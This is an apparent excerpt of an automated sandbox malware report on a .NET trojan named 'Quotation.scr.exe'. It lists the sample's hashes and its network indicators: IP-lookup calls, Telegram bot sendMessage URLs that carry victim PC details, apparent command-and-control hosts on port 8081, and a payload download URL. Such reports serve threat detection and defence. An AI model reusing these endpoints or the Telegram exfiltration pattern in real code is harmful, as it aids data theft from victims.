https://stackoverflow.com/q/11564914/23354; | 0% | Avira URL Cloud | safe
http://checkip.dyndns.org/ | 0% | Virustotal | Browse
https://stackoverflow.com/q/2152978/23354 | 0% | Avira URL Cloud | safe
http://checkip.dyndns.org/q | 0% | Avira URL Cloud | safe
https://stackoverflow.com/q/11564914/23354; | 0% | Virustotal | Browse
https://chrome.google.com/webstore?hl=enlB | 0% | Avira URL Cloud | safe
https://eg-mart.com/Mytiypg.vdf | 0% | Avira URL Cloud | safe
https://reallyfreegeoip.org | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:618321%0D%0ADate%20and%20Time:%2010/09/2024%20/%2003:15:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20618321%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | 0% | Avira URL Cloud | safe
https://github.com/mgravell/protobuf-neti | 0% | Virustotal | Browse
https://reallyfreegeoip.org/xml/ | 0% | Avira URL Cloud | safe
https://stackoverflow.com/q/2152978/23354 | 0% | Virustotal | Browse
https://eg-mart.com/Mytiypg.vdf | 0% | Virustotal | Browse
https://reallyfreegeoip.org | 0% | Virustotal | Browse
https://reallyfreegeoip.org/xml/ | 0% | Virustotal | Browse
http://checkip.dyndns.org/q | 0% | Virustotal | Browse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
eg-mart.com | 135.181.160.46 | true | false | - | unknown
reallyfreegeoip.org | 188.114.96.3 | true | true | - | unknown
api.telegram.org | 149.154.167.220 | true | true | - | unknown
checkip.dyndns.com | 132.226.8.169 | true | false | - | unknown
checkip.dyndns.org | unknown | unknown | true | - | unknown
Name | Malicious | Antivirus Detection | Reputation
https://reallyfreegeoip.org/xml/8.46.123.33 | false | URL Reputation: safe | unknown
http://checkip.dyndns.org/ | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://eg-mart.com/Mytiypg.vdf | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:618321%0D%0ADate%20and%20Time:%2010/09/2024%20/%2003:15:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20618321%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.office.com/ | RegAsm.exe, 00000002.00000002.4574409470.0000000002ED5000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://duckduckgo.com/chrome_newtab | RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
https://eg-mart.com | Quotation.scr.exe, 00000000.00000002.2245862196.00000000023E1000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://stackoverflow.com/q/14436606/23354 | Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2245862196.0000000002427000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://api.telegram.org | RegAsm.exe, 00000002.00000002.4574409470.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://github.com/mgravell/protobuf-netJ | Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://api.telegram.org/bot | Quotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp | false | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://www.office.com/lB | RegAsm.exe, 00000002.00000002.4574409470.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://github.com/mgravell/protobuf-net | Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://checkip.dyndns.org | RegAsm.exe, 00000002.00000002.4574409470.0000000002D11000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text= | RegAsm.exe, 00000002.00000002.4574409470.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://chrome.google.com/webstore?hl=en | RegAsm.exe, 00000002.00000002.4574409470.0000000002EA4000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://varders.kozow.com:8081 | Quotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:618321%0D%0ADate%20a | RegAsm.exe, 00000002.00000002.4574409470.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://aborters.duckdns.org:8081 | Quotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
https://ac.ecosia.org/autocomplete?q= | RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/mgravell/protobuf-neti | Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://reallyfreegeoip.org/xml/8.46.123.33$ | RegAsm.exe, 00000002.00000002.4574409470.0000000002D89000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002DCF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://anotherarmy.dns.army:8081 | Quotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
https://stackoverflow.com/q/11564914/23354; | Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://stackoverflow.com/q/2152978/23354 | Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://checkip.dyndns.org/q | Quotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://chrome.google.com/webstore?hl=enlB | RegAsm.exe, 00000002.00000002.4574409470.0000000002E9F000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://reallyfreegeoip.org | RegAsm.exe, 00000002.00000002.4574409470.0000000002DCF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002D5F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Quotation.scr.exe, 00000000.00000002.2245862196.00000000023E1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002D11000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | Quotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe
                    unknown
                    https://reallyfreegeoip.org/xml/Quotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002D5F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
Flag legend:
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

IP | Domain | Country | ASN | ASN Name | Malicious
132.226.8.169 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
188.114.96.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | true
135.181.160.46 | eg-mart.com | Germany | 24940 | HETZNER-ASDE | false
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1507754
                    Start date and time:2024-09-09 08:54:04 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 8m 19s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:8
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:Quotation.scr.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@3/0@4/4
                    EGA Information:
                    • Successful, ratio: 50%
                    HCA Information:
                    • Successful, ratio: 95%
                    • Number of executed functions: 361
                    • Number of non-executed functions: 33
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target RegAsm.exe, PID 2432 because it is empty
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:55:16 | API Interceptor | 11765548x Sleep call for process: RegAsm.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context

132.226.8.169
• Report Of Special Working Allowance (Eng) Aug 2024_xls.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
• RFQ.exe | malicious | MassLogger RAT, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
• SecuriteInfo.com.Exploit.CVE-2017-11882.123.4528.19655.rtf | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
• Bill of Lading.xls | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
• Purchase Order.xlsm | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
• Skrumle.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
• CV-JOB REQUEST.exe | malicious | GuLoader, Snake Keylogger | checkip.dyndns.org/
• FACTURA09.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
• FACTURA_PDF.exe | malicious | GuLoader | checkip.dyndns.org/
• Factura.pdf.exe | malicious | Snake Keylogger | checkip.dyndns.org/

149.154.167.220
• SecuriteInfo.com.Trojan.Packed2.47861.5875.12260.exe | malicious | Snake Keylogger, VIP Keylogger
• Update.exe | malicious | Blank Grabber, Redline Clipper, Xmrig
• Report Of Special Working Allowance (Eng) Aug 2024_xls.exe | malicious | Snake Keylogger, VIP Keylogger
• Zaplata_06092024,jpg.exe | malicious | Snake Keylogger, VIP Keylogger
• MV XINHONG PARTICULARS.pdf.scr.exe | malicious | Snake Keylogger, VIP Keylogger
• MARINE HONESTY VESSEL'S DETAILS.docx.scr.exe | malicious | Snake Keylogger, VIP Keylogger
• payment receipt #8646850983653.exe | malicious | Snake Keylogger, VIP Keylogger
• oG6R4bo1Rd.exe | malicious | DCRat, PureLog Stealer, zgRAT
• 66dcad8f5f33a_crypted.exe | malicious | MicroClip, RedLine
• IDMan.exe | malicious | Fredy Stealer
Match | Associated Sample Name / URL | Detection | Threat Name | Context

reallyfreegeoip.org
• SecuriteInfo.com.Trojan.Packed2.47861.5875.12260.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
• Report Of Special Working Allowance (Eng) Aug 2024_xls.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
• Zaplata_06092024,jpg.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
• MV XINHONG PARTICULARS.pdf.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
• MARINE HONESTY VESSEL'S DETAILS.docx.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
• payment receipt #8646850983653.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
• RFQ.exe | malicious | MassLogger RAT, Snake Keylogger, VIP Keylogger | 188.114.97.3
• RFQ DO NO17665.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
• YzvChS4FPi.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 188.114.97.3
• SecuriteInfo.com.Exploit.CVE-2017-11882.123.4528.19655.rtf | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3

api.telegram.org
• SecuriteInfo.com.Trojan.Packed2.47861.5875.12260.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
• Update.exe | malicious | Blank Grabber, Redline Clipper, Xmrig | 149.154.167.220
• Report Of Special Working Allowance (Eng) Aug 2024_xls.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
• Zaplata_06092024,jpg.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
• MV XINHONG PARTICULARS.pdf.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
• MARINE HONESTY VESSEL'S DETAILS.docx.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
• payment receipt #8646850983653.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
• oG6R4bo1Rd.exe | malicious | DCRat, PureLog Stealer, zgRAT | 149.154.167.220
• 66dcad8f5f33a_crypted.exe | malicious | MicroClip, RedLine | 149.154.167.220
• IDMan.exe | malicious | Fredy Stealer | 149.154.167.220

checkip.dyndns.com
• SecuriteInfo.com.Trojan.Packed2.47861.5875.12260.exe | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
• Report Of Special Working Allowance (Eng) Aug 2024_xls.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.8.169
• Zaplata_06092024,jpg.exe | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
• MV XINHONG PARTICULARS.pdf.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
• MARINE HONESTY VESSEL'S DETAILS.docx.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
• payment receipt #8646850983653.exe | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
• RFQ.exe | malicious | MassLogger RAT, Snake Keylogger, VIP Keylogger | 132.226.8.169
• RFQ DO NO17665.exe | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
• YzvChS4FPi.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 193.122.6.168
• SecuriteInfo.com.Exploit.CVE-2017-11882.123.4528.19655.rtf | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
Match | Associated Sample Name / URL | Detection | Threat Name | Context

TELEGRAMRU
• SecuriteInfo.com.Trojan.Packed2.47861.5875.12260.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
• Update.exe | malicious | Blank Grabber, Redline Clipper, Xmrig | 149.154.167.220
• Report Of Special Working Allowance (Eng) Aug 2024_xls.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
• Zaplata_06092024,jpg.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
• MV XINHONG PARTICULARS.pdf.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
• MARINE HONESTY VESSEL'S DETAILS.docx.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
• payment receipt #8646850983653.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
• oG6R4bo1Rd.exe | malicious | DCRat, PureLog Stealer, zgRAT | 149.154.167.220
• PM7K6PbAf0.exe | malicious | LummaC, Amadey, LummaC Stealer, Neoreklami, PureLog Stealer, RedLine, Stealc | 149.154.167.99
• s.exe | malicious | LummaC, Stealc, Vidar | 149.154.167.99

UTMEMUS
• Report Of Special Working Allowance (Eng) Aug 2024_xls.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.8.169
• RFQ.exe | malicious | MassLogger RAT, Snake Keylogger, VIP Keylogger | 132.226.8.169
• https://vigilantesecurity.ca/index.shtml | malicious | Unknown | 132.226.214.62
• https://domainsecurityreports.ca/index.shtml | malicious | Unknown | 132.226.214.62
• https://domainsecurityreports.ca/index.shtml | malicious | Unknown | 132.226.214.62
• SecuriteInfo.com.Exploit.CVE-2017-11882.123.4528.19655.rtf | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
• Distributrnets.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
• Recibo de env#U00edo de DHL_Gu#U00eda de embarque Doc_PRG211003417144356060.PDF.lzh.lzh.lzh.exe | malicious | Snake Keylogger | 132.226.247.73
• Bill of Lading.xls | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
• Purchase Order.xlsm | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73

CLOUDFLARENETUS
• https://go.skimresources.com/?id=129857X1600501&url=https://www.freelancer.com/users/login-quick.php?token=30b3628412ea618dcc3f414b266ae263302b3e1b43e6d2d885225319dabe8e68&url=https://secure.adnxs.com/seg?redir=https://link.sbstck.com/redirect/c16392c5-3f33-44df-b0b3-21de244d07c1?j=eyJ1IjoiNGRnZ2x2In0.IkG1h6SLHR3lrFyuSAoQTcZBzKZHtH4uVLaC9IQ4Uu8 | malicious | HTMLPhisher | 104.17.25.14
• SecuriteInfo.com.Trojan.Packed2.47861.5875.12260.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
• Report Of Special Working Allowance (Eng) Aug 2024_xls.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
• Zaplata_06092024,jpg.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
• https://www.cognitoforms.com/Wetakethecake/WeTakeTheCake#vR_oiUXojzonA0D6pvtbQdYGiL6oaoT5xWL0wQgDDEc$* | malicious | HTMLPhisher | 104.17.25.14
• MV XINHONG PARTICULARS.pdf.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
• MARINE HONESTY VESSEL'S DETAILS.docx.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
• payment receipt #8646850983653.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
• https://darlin.com.au/ | malicious | Unknown | 172.64.150.190
• https://eu-central-1.protection.sophos.com/?d=convertcontacts.com&u=aHR0cDovL21haWwuY29udmVydGNvbnRhY3RzLmNvbS9scy9jbGljaz91cG49dTAwMS4tMkZPZ2p2UDZlSEpMUThnRkNaWFFWYVdwSW9wc2R3cTcyQzhaR2p0eWFDYmt1U25VYkpra2g5YTVWdUxMZ3VQcTA2OFpPX2otMkIzT0FHSFlyemxyWGM0d1dHdkFlaXYtMkZNV2VJQTlOWk9iOTc0YS0yQlpvdnAxN0l5aGZoeWdhczFXVkJvMTNESUhrNWF5eEpuSHB6ZEdzeXI3SEJ4eE9ZVGxlZHp3R090RUNYcFJad0ljUC0yRlU2Um1RMlZZRS0yQm5lNU4zUTZMTHNQNXJRNTNyZi0yQmRGVFc4bThFTlNFdGI2dWFtLTJGR3NrQ3lZQjBVQ3oxalh1elAtMkYxb3BIQmxaaEF3YWI5ZHFmcXhVb3hXU0puWlh5eS0yRmtFS2FJLTJGSUU1eUhCQS0zRC0zRA==&p=m&i=NWNiN2ZlZTg4MWQzYmMxNDQ2YTllMzg2&t=MzVESEtqZVpmK2lydmd6VlJBZ0dOd0VXaHNLamhvK21MK1pYQzM4L0JEUT0=&h=e14b286494664ef891348988c9e838b4&s=AVNPUEhUT0NFTkNSWVBUSVYoFOpcRSmtylFH3LId5iHD0shJ7qIqV8UAVy4ANYCuCYR3Alb2xoJLC7nF0vB_FDAfdi-bbhqFa2YYLKpVwPUnPTAMVQe9kqbfwYJ_E95Mtw | malicious | HTMLPhisher | 104.21.45.208
Match | Associated Sample Name / URL | Detection | Threat Name | Context

54328bd36c14bd82ddaa0c04b25ed9ad
• SecuriteInfo.com.Trojan.Packed2.47861.5875.12260.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
• Report Of Special Working Allowance (Eng) Aug 2024_xls.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
• Zaplata_06092024,jpg.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
• MV XINHONG PARTICULARS.pdf.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
• MARINE HONESTY VESSEL'S DETAILS.docx.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
• payment receipt #8646850983653.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
• RFQ.exe | malicious | MassLogger RAT, Snake Keylogger, VIP Keylogger | 188.114.96.3
• SecuriteInfo.com.Adware.DownwareNET.4.3128.32406.exe | malicious | Unknown | 188.114.96.3
• SecuriteInfo.com.Adware.DownwareNET.4.3128.32406.exe | malicious | Unknown | 188.114.96.3
• RFQ DO NO17665.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3

3b5074b1b5d032e5620f69f9f700ff0e
• pko_trans_details_20240909_105339#U00b7pdf.vbs | malicious | Remcos, GuLoader | 149.154.167.220, 135.181.160.46
• SKT ____202409_____6__.vbs | malicious | Remcos, GuLoader | 149.154.167.220, 135.181.160.46
• filz.exe | malicious | FormBook | 149.154.167.220, 135.181.160.46
• waybill_original_invoice_bl_packinglist_shipment_09_09_2024_0000000000000000000000000000_pdf.bat | malicious | Remcos, GuLoader | 149.154.167.220, 135.181.160.46
• SecuriteInfo.com.Trojan.Packed2.47861.5875.12260.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220, 135.181.160.46
• rfqlastquaterproductpurchaseorderimportlist09.bat | malicious | GuLoader, Remcos | 149.154.167.220, 135.181.160.46
• Report Of Special Working Allowance (Eng) Aug 2024_xls.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220, 135.181.160.46
• Zaplata_06092024,jpg.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220, 135.181.160.46
• MV XINHONG PARTICULARS.pdf.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220, 135.181.160.46
• uD9I18eLZ6.exe | malicious | PureLog Stealer, Raccoon Stealer v2, RedLine, zgRAT | 149.154.167.220, 135.181.160.46
                                        No context
                                        No created / dropped files found
                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):4.432801846329874
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        File name:Quotation.scr.exe
                                        File size:6'144 bytes
                                        MD5:e0a5ee16dd5018801a0afadb2559b555
                                        SHA1:26443711531805d3e268212b552632558e90a015
                                        SHA256:6b89ca3745f66447d9dab6fc2bd79820dd3ee4ce5edc40c25d1c7bf2c9250352
                                        SHA512:79b0405fcf1a4931867834278f771e5be1f1637bd8746a16934f6e6118ee6559dc546de2d3e912bb269e4e22e938d0b6599473813b6ca1de27623615110ae473
                                        SSDEEP:48:6gmEHl21SxTrP8tMVjKRHD8MB+MuER8YwNjkGlqLcyxwssJh7VeCtnUlaaIFWpfG:t2weW5OHN+2yBNjLScyxNGhQcczNt
                                        TLSH:5DC1D910A3F8437BDD720B719CB3A3406278F351995BCF9D1985214B3E53B918A53FA2
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'D.f.............................,... ...@....@.. ....................................`................................
                                        Icon Hash:00928e8e8686b000
                                        Entrypoint:0x402c8e
                                        Entrypoint Section:.text
